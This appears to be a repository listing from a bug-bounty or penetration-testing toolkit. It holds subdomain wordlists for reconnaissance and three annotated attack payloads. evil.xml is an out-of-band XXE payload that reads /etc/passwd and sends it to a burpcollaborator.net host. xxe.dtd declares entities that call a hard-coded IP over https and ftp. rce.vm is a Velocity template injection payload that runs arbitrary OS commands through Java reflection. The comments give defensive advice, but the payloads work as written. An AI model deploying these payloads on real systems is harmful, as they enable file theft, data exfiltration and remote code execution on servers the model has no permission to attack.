View 1stleveldomainsbycount
www,719407
api,69552
eks,67581
svc,67131
cloudapp,65945
vpn,55659
bastion,53840
ax,40676
dev,38756
View evil.xml
<!-- DTD fragment showing out-of-band XXE file disclosure: a parser that
     processes it with external entities enabled reads a local file and
     sends the content to a remote HTTP host.
     Defence: disable DOCTYPE and external-entity processing in the XML
     parser, and alert on outbound HTTP requests made by XML-handling
     services. -->
<!-- Parameter entity whose replacement text is the content of /etc/passwd. -->
<!ENTITY % xxePOC SYSTEM "file:///etc/passwd">
<!-- Replacement text is itself a declaration of a parameter entity named
     exfil (&#x25; is the escaped percent sign). Its system identifier is an
     HTTP URL on a burpcollaborator.net host that carries the xxePOC value
     in the x query parameter. -->
<!ENTITY % exfildata "<!ENTITY &#x25; exfil SYSTEM 'http://7u2bvf9vu78d9wepre2c3qmg87e82x.burpcollaborator.net/?x=%xxePOC;'>">
<!-- Expanding exfildata makes the exfil declaration take effect. -->
%exfildata;
<!-- Expanding exfil triggers the outbound request; that request is the
     observable event to look for in egress and proxy logs. -->
%exfil;
View xxe.dtd
<!-- DTD fragment in the same external-entity (XXE) family. Both URLs point
     at one IP address on port 443, once over https and once over ftp.
     Only declarations are visible here; nothing on these lines expands
     them. Defence: disable DOCTYPE and external-entity processing, and
     restrict outbound connections from hosts that parse XML. -->
<!-- Parameter entity d: replacement text is whatever the https URL returns. -->
<!ENTITY % d SYSTEM "https://138.68.23.180:443">
<!-- Parameter entity c: replacement text declares a general entity rrr whose
     system identifier is an ftp URL with the value of d appended as the path. -->
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://138.68.23.180:443/%d;'>">
View extracted-subdomains
prestigegiftware
12boxing
7clouds
alfredhealth
mywell
phdrastreador
halorei
qa2static
hemoservice
View rce.vm
## Velocity template that runs an operating-system command through Java
## reflection and writes the command's output into the rendered result.
## Why it matters to defenders: rendering template text from an untrusted
## source with an unrestricted introspector is equivalent to code execution
## inside the JVM. Do not evaluate untrusted templates; Velocity's
## SecureUberspector restricts this kind of reflective class access.
## NOTE(review): confirm which uberspector the deployment actually uses.
## $cmd is not set anywhere in this template; it has to come from the
## rendering context.
## $e is an ordinary String, used only as a starting object for getClass().
#set ($e="exp")
## Looks up java.lang.Runtime by name, invokes getRuntime() reflectively and
## calls exec($cmd) on the result; $a holds the returned Process.
#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
## Reflectively calls Process.getInputStream() on $a to obtain the stdout stream.
#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
## Resolves java.util.Scanner and its constructor that takes an InputStream.
#set($sc = $e.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
## Wraps the stream in a Scanner; the delimiter is presumably chosen so that
## the whole stream comes back as a single token (verify against the escaping).
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
## Emits the captured output into the page only when the stream had content.
#if($scan.hasNext())
$scan.next()
#end